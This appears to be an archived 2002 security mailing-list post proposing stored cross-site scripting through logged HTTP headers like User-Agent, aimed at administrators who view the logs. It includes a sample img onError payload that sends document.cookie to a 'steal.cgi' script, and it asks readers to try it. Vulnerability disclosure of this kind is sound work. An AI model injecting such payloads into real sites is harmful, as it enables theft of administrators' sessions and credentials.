XSS And Headers...

From: lok lok (itslok@hotmail.com)
Date: 05/25/02 

From: "lok lok" <itslok@hotmail.com>
To: security-basics@security-focus.com, bugtraq@securityfocus.com, vuln-dev@securityfocus.com
Date: Sat, 25 May 2002 14:01:10 +1000

There used to be alot of discussion about XSS, cross-site scripting where
you can insert html into pages that are viewed by many ppl and steal info...

most of these sites (e.g. a bulletin board) have been updated to protect
this behaviour...

however, i've noticed that many do not cover headers..

e.g.

HTTP_USER_AGENT may be logged or stored somewhere when you sign-up to
website "abc". The administrator, or whoever will check over your account
and see your browser type...

normally it would contain something like... Mozilla/4.0 (compatible; MSIE
6.0; Windows NT 5.1; .NET CLR 1.0.3705)
..

but with a proxy prog (i use proxomitron) you can change it to whatever you
like..

for example: <img src="x.jpg"
onError="this.src='steal.cgi?document.cookie';">

and if the site logs it, you just got the administrators password:)

Now, im yet to come across any sites that this works on because i just
thought of it this afternoon but let me know if it works:) in any case, a
lot of sites would log/store this kind of information so it should be fixed.

_________________________________________________________________
MSN Photos is the easiest way to share and print your photos:
http://photos.msn.com/support/worldwide.aspx